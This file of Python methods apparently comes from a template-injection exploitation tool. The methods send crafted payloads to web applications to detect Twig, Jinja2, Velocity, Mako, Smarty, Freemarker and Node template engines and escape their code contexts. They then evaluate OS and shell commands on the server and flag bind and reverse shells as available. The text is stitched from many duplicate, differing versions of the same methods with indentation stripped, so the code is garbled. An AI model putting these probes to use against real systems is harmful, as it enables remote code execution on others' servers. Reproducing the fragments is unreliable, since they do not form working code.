def _detect_dust(self):
# Print what it's going to be tested
log.info('%s plugin is testing rendering' % (
self.plugin,
)
)
for prefix, suffix in self._generate_contexts():
payload = 'AA{!c!}AA'
header_rand = rand.randint_n(10)
header = str(header_rand)
trailer_rand = rand.randint_n(10)
trailer = str(trailer_rand)
if 'AAAA' == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('header', '%s')
self.set('trailer', '%s')
self.set('prefix', prefix)
self.set('suffix', suffix)
self.set('engine', self.plugin.lower())
self.set('language', self.language)
return
def inject(self,
payload,
header=None,
header_rand=None,
trailer=None,
trailer_rand=None,
prefix=None,
suffix=None):
header_rand = rand.randint_n(3) if header_rand == None else header_rand
header = self.get('header_tag', '%(header)s') % ({
'header': header_rand
}) if header == None else header
trailer_rand = rand.randint_n(
3) if trailer_rand == None else trailer_rand
trailer = self.get('trailer_tag', '%(trailer)s') % ({
'trailer':
trailer_rand
}) if trailer == None else trailer
prefix = self.get('prefix', '') if prefix == None else prefix
suffix = self.get('suffix', '') if suffix == None else suffix
injection = prefix + header + payload + trailer + suffix
result = self.channel.req(injection)
log.debug('[request %s]' % (self.plugin))
# Cut the result using the header and trailer if specified
if header:
before, _, result = result.partition(str(header_rand))
if trailer:
result, _, after = result.partition(str(trailer_rand))
return result.strip()
def _detect_dust(self):
# Print what it's going to be tested
log.info('%s plugin is testing rendering' % (self.plugin, ))
for prefix, suffix in self._generate_contexts():
payload = '{!c!}'
header_rand = rand.randint_n(10)
header = str(header_rand)
trailer_rand = rand.randint_n(10)
trailer = str(trailer_rand)
if '' == self.render(code=payload,
header=header,
trailer=trailer,
header_rand=header_rand,
trailer_rand=trailer_rand,
prefix=prefix,
suffix=suffix):
self.set('header', '%s')
self.set('trailer', '%s')
self.set('prefix', prefix)
self.set('suffix', suffix)
self.set('engine', self.plugin.lower())
self.set('language', self.language)
return
def detect_engine(self):
randA = rand.randint_n(1)
randB = rand.randint_n(1)
# {{7*'7'}} and a{#b#}c work in freemarker as well
payload = '{%% set a=%i*%i %%}{{a}}' % (randA, randB)
expected = str(randA * randB)
if expected == self.inject(payload):
self.set('language', 'php')
self.set('engine', 'twig')
def render(self, code, **kwargs):
header_template = kwargs.get('header', self.get('header'))
if header_template:
header_rand = kwargs.get(
'header_rand', self.get('header_rand', rand.randint_n(10)))
header = header_template % ({'header': header_rand})
else:
header_rand = 0
header = ''
trailer_template = kwargs.get('trailer', self.get('trailer'))
if trailer_template:
trailer_rand = kwargs.get(
'trailer_rand', self.get('trailer_rand', rand.randint_n(10)))
trailer = trailer_template % ({'trailer': trailer_rand})
else:
trailer_rand = 0
trailer = ''
prefix = kwargs.get('prefix', self.get('prefix', ''))
suffix = kwargs.get('suffix', self.get('suffix', ''))
blind = kwargs.get('blind', False)
injection = header + code + trailer
# Save the average HTTP request time of rendering in order
# to better tone the blind request timeouts.
result_raw = self.inject(code=injection,
prefix=prefix,
suffix=suffix,
blind=blind)
if blind:
return result_raw
else:
result = None
# Return result_raw if header and trailer are not specified
if not header and not trailer:
return result_raw
# Cut the result using the header and trailer if specified
if header:
before, _, result_after = result_raw.partition(
str(header_rand))
if trailer and result_after:
result, _, after = result_after.partition(str(trailer_rand))
return result.strip() if result else result
def blind_detected(self):
if self.execute_blind('echo %s' % str(rand.randint_n(2))):
self.set('execute_blind', True)
self.set('write', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
randA = rand.randstr_n(2)
# Check this to avoid false positives
payload = 'p %s' % randA
expected = '<p>%s</p>' % randA
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate("""global.process.mainModule.require('os').platform()""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
randA = rand.randstr_n(2)
randB = rand.randstr_n(2)
payload = '"%s".join("%s")' % (randA, randB)
expected = randA.join(randB)
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate(
"""'-'.join([__import__('os').name, __import__('sys').platform])"""
)
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def detect_exec(self):
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('exec', True)
self.set('os', self.execute("uname"))
def detect_exec(self):
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('exec', True)
self.set('os', self.execute("uname"))
def rendered_detected(self):
randA = rand.randstr_n(2)
randB = rand.randstr_n(2)
# Check this to avoid detecting Twig as Jinja2
payload = '{{"%s".join("%s")}}' % (randA, randB)
expected = randA.join(randB)
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate("""'-'.join([__import__('os').name, __import__('sys').platform])""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
randA = rand.randstr_n(2)
# Check this to avoid false positives
payload = 'p %s' % randA
expected = '<p>%s</p>' % randA
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate(
"""global.process.mainModule.require('os').platform()""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def detect_exec(self):
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('exec', True)
# TODO: manage Window environment
self.set('os', self.execute("uname"))
def detect_engine(self):
expected_rand = str(rand.randint_n(1))
payload = '#set($p=%(payload)s)\n$p\n' % ({'payload': expected_rand})
if expected_rand == self.inject(payload):
self.set('language', 'java')
self.set('engine', 'velocity')
def detect_exec(self):
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('exec', True)
# TODO: manage Window environment
self.set('os', self.execute("uname"))
def detect_engine(self):
expected_rand = str(rand.randint_n(1))
payload = '#set($p=%(payload)s)\n$p\n' % ({ 'payload': expected_rand })
if expected_rand == self.inject(payload):
self.set('language', 'java')
self.set('engine', 'velocity')
def _detect_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.info('%s plugin is testing rendering with tag %s' % (
self.plugin,
repr(render_action.get('render') % ({
'code': '*'
})),
))
for prefix, suffix in self._generate_contexts():
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA * randB)
payload = render_action.get('render') % ({
'code':
'%s*%s' % (randA, randB)
})
header_rand = rand.randint_n(10)
header = render_action.get('header') % ({'header': header_rand})
trailer_rand = rand.randint_n(10)
trailer = render_action.get('trailer') % ({
'trailer': trailer_rand
})
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(code=payload,
header=header,
trailer=trailer,
header_rand=header_rand,
trailer_rand=trailer_rand,
prefix=prefix,
suffix=suffix):
self.set('render', render_action.get('render'))
self.set('header', render_action.get('header'))
self.set('trailer', render_action.get('trailer'))
self.set('prefix', prefix)
self.set('suffix', suffix)
return
def detect_engine(self):
# TODO: remove this as already performed on discovery phase
expected_rand = str(rand.randint_n(1))
payload = '#set($p=%(payload)s)\n$p\n' % ({ 'payload': expected_rand })
if expected_rand == self.render(payload):
self.set('language', 'java')
self.set('engine', 'velocity')
def blind_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
if self.execute_blind('echo %s' % str(rand.randint_n(2))):
self.set('execute_blind', True)
self.set('write', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def blind_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
if self.execute_blind('echo %s' % str(rand.randint_n(2))):
self.set('execute_blind', True)
self.set('write', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def detect_engine(self):
randA = rand.randint_n(1)
payload = '{{7*\'%s\'}}' % (randA)
expected = str(randA*7)
if expected == self.inject(payload):
self.set('language', 'python')
self.set('engine', 'twig')
def blind_detected(self):
# Blind has been detected so code has been already evaluated
self.set('evaluate_blind', self.language)
if self.execute_blind('echo %s' % str(rand.randint_n(2))):
self.set('execute_blind', True)
self.set('write', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def _detect_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.info('%s plugin is testing rendering with tag %s' % (
self.plugin,
repr(render_action.get('render') % ({'code' : '*' })),
)
)
for prefix, suffix in self._generate_contexts():
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
header_rand = rand.randint_n(10)
header = render_action.get('header') % ({ 'header' : header_rand })
trailer_rand = rand.randint_n(10)
trailer = render_action.get('trailer') % ({ 'trailer' : trailer_rand })
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('render', render_action.get('render'))
self.set('header', render_action.get('header'))
self.set('trailer', render_action.get('trailer'))
self.set('prefix', prefix)
self.set('suffix', suffix)
return
def _detect_unreliable_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.debug('%s plugin is testing unreliable rendering on text context' %
(self.plugin))
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA * randB)
payload = render_action.get('render') % ({
'code':
'%s*%s' % (randA, randB)
})
# Probe with payload wrapped by header and trailer, no suffex or prefix.
# Test if contained, since the page contains other garbage
if expected in self.render(code=payload,
header='',
trailer='',
header_rand=None,
trailer_rand=None,
prefix='',
suffix=''):
# Print if the first found unreliable renode
if not self.get('unreliable_render'):
log.info(
'%s plugin has detected unreliable rendering with tag %s, skipping'
% (self.plugin,
repr(render_action.get('render') % ({
'code': '*'
}))))
self.set('unreliable_render', render_action.get('render'))
self.set('unreliable', self.plugin)
return
def detect_eval(self):
expected_rand = str(rand.randint_n(1))
payload = """print('%s');""" % expected_rand
result_php_tag = self.evaluate(payload)
# If {php} is sent back means is in secure mode
if expected_rand == result_php_tag:
self.set('eval', 'php')
self.set('os', self.evaluate('echo PHP_OS;'))
def detect_eval(self):
expected_rand = str(rand.randint_n(1))
payload = """print('%s');""" % expected_rand
result_php_tag = self.evaluate(payload)
# If {php} is sent back means is in secure mode
if expected_rand == result_php_tag:
self.set('evaluate', 'php')
self.set('os', self.evaluate('echo PHP_OS;'))
def render(self, code, **kwargs):
header_rand = kwargs.get('header_rand', self.get('header_rand', rand.randint_n(10)))
header = kwargs.get('header', self.get('header', '%(header)s') % ({ 'header' : header_rand }))
trailer_rand = kwargs.get('trailer_rand', self.get('trailer_rand', rand.randint_n(10)))
trailer = kwargs.get('trailer', self.get('trailer', '%(trailer)s') % ({ 'trailer' : trailer_rand }))
prefix = kwargs.get('prefix', self.get('prefix', ''))
suffix = kwargs.get('suffix', self.get('suffix', ''))
blind = kwargs.get('blind', False)
injection = header + code + trailer
# Save the average HTTP request time of rendering in order
# to better tone the blind request timeouts.
result_raw = self.inject(
code = injection,
prefix = prefix,
suffix = suffix,
blind = blind
)
if blind:
return result_raw
else:
result = None
# Return result_raw if header and trailer are not specified
if not header and not trailer:
return result_raw
# Cut the result using the header and trailer if specified
if header:
before,_,result_after = result_raw.partition(str(header_rand))
if trailer and result_after:
result,_,after = result_after.partition(str(trailer_rand))
return result.strip() if result else result
def _detect_unreliable_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.debug('%s plugin is testing unreliable rendering on text context' % (
self.plugin
)
)
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
# Probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(
code = payload,
header = '',
trailer = '',
header_rand = None,
trailer_rand = None,
prefix = '',
suffix = ''
):
self.set('render', render_action.get('render'))
# Print if the first found unreliable renode
if not self.get('unreliable'):
log.info('%s plugin has detected unreliable rendering with tag %s, skipping' % (
self.plugin,
repr(self.get('render') % ({'code' : '*' })))
)
self.set('unreliable', self.plugin)
return
def rendered_detected(self):
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('write', True)
self.set('read', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
os = self.execute("""uname""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
def blind_detected(self):
self.set("engine", self.plugin.lower())
self.set("language", self.language)
# Blind has been detected so code has been already evaluated
self.set("evaluate_blind", self.language)
if self.execute_blind("echo %s" % str(rand.randint_n(2))):
self.set("execute_blind", True)
self.set("write", True)
self.set("bind_shell", True)
self.set("reverse_shell", True)
def blind_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
# Blind has been detected so code has been already evaluated
self.set('evaluate_blind', self.language)
if self.execute_blind('echo %s' % str(rand.randint_n(2))):
self.set('execute_blind', True)
self.set('write', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def inject(self, payload, header = None, header_rand = None, trailer = None, trailer_rand = None, prefix = None, suffix = None):
header_rand = rand.randint_n(3) if header_rand == None else header_rand
header = self.get('header_tag', '%(header)s') % ({ 'header' : header_rand }) if header == None else header
trailer_rand = rand.randint_n(3) if trailer_rand == None else trailer_rand
trailer = self.get('trailer_tag', '%(trailer)s') % ({ 'trailer' : trailer_rand }) if trailer == None else trailer
prefix = self.get('prefix', '') if prefix == None else prefix
suffix = self.get('suffix', '') if suffix == None else suffix
injection = prefix + header + payload + trailer + suffix
result = self.channel.req(injection)
log.debug('[request %s]\n > %s\n < %s' % (self.plugin, injection.replace('\n', '\n > '), result.replace('\n', ' \n < ')) )
# Cut the result using the header and trailer if specified
if header:
before,_,result = result.partition(str(header_rand))
if trailer:
result,_,after = result.partition(str(trailer_rand))
return result.strip()
def rendered_detected(self):
os = self.evaluate("""global.process.mainModule.require('os').platform()""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
os = self.render("""{{__import__('os').name + '-' + __import__('sys').platform}}""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
os = self.evaluate("""echo PHP_OS;""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
os = self.render(
"""<% import sys, os; x=os.name; y=sys.platform; %>${x}-${y}""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def inject(self, payload, header = None, header_rand = None, trailer = None, trailer_rand = None, prefix = None, suffix = None):
header_rand = rand.randint_n(10) if header_rand == None else header_rand
header = self.get('header_fmt', '%(header)s') % ({ 'header' : header_rand }) if header == None else header
trailer_rand = rand.randint_n(10) if trailer_rand == None else trailer_rand
trailer = self.get('trailer_fmt', '%(trailer)s') % ({ 'trailer' : trailer_rand }) if trailer == None else trailer
prefix = self.get('prefix', '') if prefix == None else prefix
suffix = self.get('suffix', '') if suffix == None else suffix
injection = prefix + header + payload + trailer + suffix
log.debug('[request %s] %s' % (self.plugin, repr(self.channel.url)))
result_raw = self.channel.req(injection)
result = None
# Cut the result using the header and trailer if specified
if header:
before,_,result_after = result_raw.partition(str(header_rand))
if trailer and result_after:
result,_,after = result_after.partition(str(trailer_rand))
return result.strip() if result else result
def rendered_detected(self):
self.set("engine", self.plugin.lower())
self.set("language", self.language)
os = self.render("""<% import sys, os; x=os.name; y=sys.platform; %>${x}-${y}""")
if os and re.search("^[\w-]+$", os):
self.set("os", os)
self.set("evaluate", self.language)
self.set("write", True)
self.set("read", True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute("echo %s" % expected_rand):
self.set("execute", True)
self.set("bind_shell", True)
self.set("reverse_shell", True)
def rendered_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate("""require('os').platform()""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate("""global.process.mainModule.require('os').platform()""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
def rendered_detected(self):
payload = "#* comm *#"
if "" == self.render(payload):
# Since the render format is pretty peculiar assume
# engine name if render has been detected.
self.set("engine", self.plugin.lower())
self.set("language", self.language)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute("echo %s" % expected_rand):
self.set("execute", True)
os = self.execute("""uname""")
if os and re.search("^[\w-]+$", os):
self.set("os", os)
def rendered_detected(self):
payload = '#* comm *#'
if '' == self.render(payload):
# Since the render format is pretty peculiar assume
# engine name if render has been detected.
self.set('engine', self.plugin.lower())
self.set('language', self.language)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
os = self.execute("""uname""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
def rendered_detected(self):
randA = rand.randstr_n(1)
randB = rand.randstr_n(1)
payload = '%s<#--%s-->%s' % (randA, rand.randstr_n(1), randB)
expected = randA + randB
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('write', True)
self.set('read', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
os = self.execute("""uname""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
def rendered_detected(self):
randA = rand.randstr_n(1)
randB = rand.randstr_n(1)
payload = '%s<#--%s-->%s' % (randA, rand.randstr_n(1), randB)
expected = randA + randB
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('write', True)
self.set('read', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
os = self.execute("""uname""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
def render(self, code, **kwargs):
# If header == '', do not send headers
header_template = kwargs.get('header')
if header_template != '':
header_template = kwargs.get('header', self.get('header'))
if not header_template:
header_template = self.actions.get('render',{}).get('header')
if header_template:
header_rand = kwargs.get('header_rand', self.get('header_rand', rand.randint_n(10)))
if '%(header)s' in header_template:
header = header_template % ({ 'header' : header_rand })
else:
header = header_template
else:
header_rand = 0
header = ''
# If trailer == '', do not send headers
trailer_template = kwargs.get('trailer')
if trailer_template != '':
trailer_template = kwargs.get('trailer', self.get('trailer'))
if not trailer_template:
trailer_template = self.actions.get('render',{}).get('trailer')
if trailer_template:
trailer_rand = kwargs.get('trailer_rand', self.get('trailer_rand', rand.randint_n(10)))
if '%(trailer)s' in trailer_template:
trailer = trailer_template % ({ 'trailer' : trailer_rand })
else:
trailer = trailer_template
else:
trailer_rand = 0
trailer = ''
payload_template = kwargs.get('render', self.get('render'))
if not payload_template:
payload_template = self.actions.get('render',{}).get('render')
if not payload_template:
# Exiting, actions.render.render is not set
return None
payload = payload_template % ({ 'code': code })
prefix = kwargs.get('prefix', self.get('prefix', ''))
suffix = kwargs.get('suffix', self.get('suffix', ''))
blind = kwargs.get('blind', False)
injection = header + payload + trailer
# Save the average HTTP request time of rendering in order
# to better tone the blind request timeouts.
result_raw = self.inject(
code = injection,
prefix = prefix,
suffix = suffix,
blind = blind
)
if blind:
return result_raw
else:
result = ''
# Return result_raw if header and trailer are not specified
if not header and not trailer:
return result_raw
# Cut the result using the header and trailer if specified
if header:
before,_,result_after = result_raw.partition(str(header_rand))
if trailer and result_after:
result,_,after = result_after.partition(str(trailer_rand))
return result.strip() if result else result
def render(self, code, **kwargs):
# If header == '', do not send headers
header_template = kwargs.get('header')
if header_template != '':
header_template = kwargs.get('header', self.get('header'))
if not header_template:
header_template = self.actions.get('render', {}).get('header')
if header_template:
header_rand = kwargs.get(
'header_rand', self.get('header_rand', rand.randint_n(10)))
if '%(header)s' in header_template:
header = header_template % ({'header': header_rand})
else:
header = header_template
else:
header_rand = 0
header = ''
# If trailer == '', do not send headers
trailer_template = kwargs.get('trailer')
if trailer_template != '':
trailer_template = kwargs.get('trailer', self.get('trailer'))
if not trailer_template:
trailer_template = self.actions.get('render',
{}).get('trailer')
if trailer_template:
trailer_rand = kwargs.get(
'trailer_rand', self.get('trailer_rand',
rand.randint_n(10)))
if '%(trailer)s' in trailer_template:
trailer = trailer_template % ({'trailer': trailer_rand})
else:
trailer = trailer_template
else:
trailer_rand = 0
trailer = ''
payload_template = kwargs.get('render', self.get('render'))
if not payload_template:
payload_template = self.actions.get('render', {}).get('render')
if not payload_template:
# Exiting, actions.render.render is not set
return None
payload = payload_template % ({'code': code})
prefix = kwargs.get('prefix', self.get('prefix', ''))
suffix = kwargs.get('suffix', self.get('suffix', ''))
blind = kwargs.get('blind', False)
injection = header + payload + trailer
# Save the average HTTP request time of rendering in order
# to better tone the blind request timeouts.
result_raw = self.inject(code=injection,
prefix=prefix,
suffix=suffix,
blind=blind)
if blind:
return result_raw
else:
result = ''
# Return result_raw if header and trailer are not specified
if not header and not trailer:
return result_raw
# Cut the result using the header and trailer if specified
if header:
before, _, result_after = result_raw.partition(
str(header_rand))
if trailer and result_after:
result, _, after = result_after.partition(str(trailer_rand))
return result.strip() if result else result
def _detect_context(self):
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
# Prepare first detection payload and header
payload = self.render_tag % ({ 'payload': '%s*%s' % (randA, randB) })
header_rand = rand.randint_n(3)
header = self.header_tag % ({ 'header' : header_rand })
trailer_rand = rand.randint_n(3)
trailer = self.trailer_tag % ({ 'trailer' : trailer_rand })
log.debug('%s: Trying to inject in text context' % self.plugin)
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.inject(
payload = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = '',
suffix = ''
):
self.set('render_tag', self.render_tag)
self.set('header_tag', self.header_tag)
self.set('trailer_tag', self.trailer_tag)
return
log.debug('%s: Injection in text context failed, trying to inject in code context' % self.plugin)
# If not found, try to inject all the prefix and suffix pairs falling below the level
for ctx in self.contexts:
if self.channel.args.get('level') > ctx.get('level', 1):
break
if expected == self.inject(
payload = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = ctx.get('prefix', ''),
suffix = ctx.get('suffix', '')
):
self.set('render_tag', self.render_tag)
self.set('header_tag', self.header_tag)
self.set('trailer_tag', self.trailer_tag)
self.set('prefix', ctx.get('prefix', ''))
self.set('suffix', ctx.get('suffix', ''))
return
log.debug('%s: Injection in code context failed, trying to inject only payload with no header' % self.plugin)
# As last resort, just inject without header and trailer and
# see if expected is contained in the response page
if expected in self.inject(
payload = payload,
header = '',
trailer = '',
header_rand = 0,
trailer_rand = 0,
prefix = '',
suffix = ''
):
self.set('render_tag', self.render_tag)
return
def _detect_context(self):
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
# Prepare first detection payload and header
payload = self.render_fmt % ({ 'payload': '%s*%s' % (randA, randB) })
header_rand = rand.randint_n(10)
header = self.header_fmt % ({ 'header' : header_rand })
trailer_rand = rand.randint_n(10)
trailer = self.trailer_fmt % ({ 'trailer' : trailer_rand })
log.debug('%s: Trying to inject in text context' % self.plugin)
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.inject(
payload = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = '',
suffix = ''
):
self.set('render_fmt', self.render_fmt)
self.set('header_fmt', self.header_fmt)
self.set('trailer_fmt', self.trailer_fmt)
return
log.debug('%s: Injection in text context failed, trying to inject in code context' % self.plugin)
# Loop all the contexts
for ctx in self.contexts:
# If --force-level skip any other level
force_level = self.channel.args.get('force_level')
if force_level and force_level[0] and ctx.get('level') != int(force_level[0]):
continue
# Skip any context which is above the required level
if not force_level and ctx.get('level') > self.channel.args.get('level'):
continue
# The suffix is fixed
suffix = ctx.get('suffix', '') % ()
# Generate closures whether prefix has closure format string and 'closure' element
if '%(closure)s' in ctx.get('prefix') and ctx.get('closures'):
closures = self._generate_closures(ctx)
prefix = ctx.get('prefix', '%(closure)s') % ( { 'closure' : '' } )
# Else, inject a fake element to perform a single run
else:
closures = [ '' ]
prefix = '%(closure)s' + ctx.get('prefix')
log.info('%s plugin is testing %s*%s code context escape with %i mutations%s' % (
self.plugin,
repr(prefix).strip("'"),
repr(suffix).strip("'"),
len(closures),
' (level %i)' % (ctx.get('level', 1)) if self.get('level') else ''
)
)
for closure in closures:
# Format the prefix with closure
prefix = ctx.get('prefix', '%(closure)s') % ( { 'closure' : closure } )
if expected == self.inject(
payload = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('render_fmt', self.render_fmt)
self.set('header_fmt', self.header_fmt)
self.set('trailer_fmt', self.trailer_fmt)
self.set('prefix', prefix)
self.set('suffix', suffix)
return
log.debug('%s: Injection in code context failed, trying raw payload with no header and trailer' % self.plugin)
# As last resort, just inject without header and trailer and
# see if expected is contained in the response page
result = self.channel.req(payload)
if result and expected in result:
self.set('render_fmt', self.render_fmt)
return
def _detect_context(self):
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA * randB)
# Prepare first detection payload and header
payload = self.render_tag % ({'payload': '%s*%s' % (randA, randB)})
header_rand = rand.randint_n(3)
header = self.header_tag % ({'header': header_rand})
trailer_rand = rand.randint_n(3)
trailer = self.trailer_tag % ({'trailer': trailer_rand})
log.debug('%s: Trying to inject in text context' % self.plugin)
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.inject(payload=payload,
header=header,
trailer=trailer,
header_rand=header_rand,
trailer_rand=trailer_rand,
prefix='',
suffix=''):
self.set('render_tag', self.render_tag)
self.set('header_tag', self.header_tag)
self.set('trailer_tag', self.trailer_tag)
return
log.debug(
'%s: Injection in text context failed, trying to inject in code context'
% self.plugin)
# If not found, try to inject all the prefix and suffix pairs falling below the level
for ctx in self.contexts:
if self.channel.args.get('level') > ctx.get('level', 1):
break
if expected == self.inject(payload=payload,
header=header,
trailer=trailer,
header_rand=header_rand,
trailer_rand=trailer_rand,
prefix=ctx.get('prefix', ''),
suffix=ctx.get('suffix', '')):
self.set('render_tag', self.render_tag)
self.set('header_tag', self.header_tag)
self.set('trailer_tag', self.trailer_tag)
self.set('prefix', ctx.get('prefix', ''))
self.set('suffix', ctx.get('suffix', ''))
return
log.debug(
'%s: Injection in code context failed, trying to inject only payload with no header'
% self.plugin)
# As last resort, just inject without header and trailer and
# see if expected is contained in the response page
if expected in self.inject(payload=payload,
header='',
trailer='',
header_rand=0,
trailer_rand=0,
prefix='',
suffix=''):
self.set('render_tag', self.render_tag)
return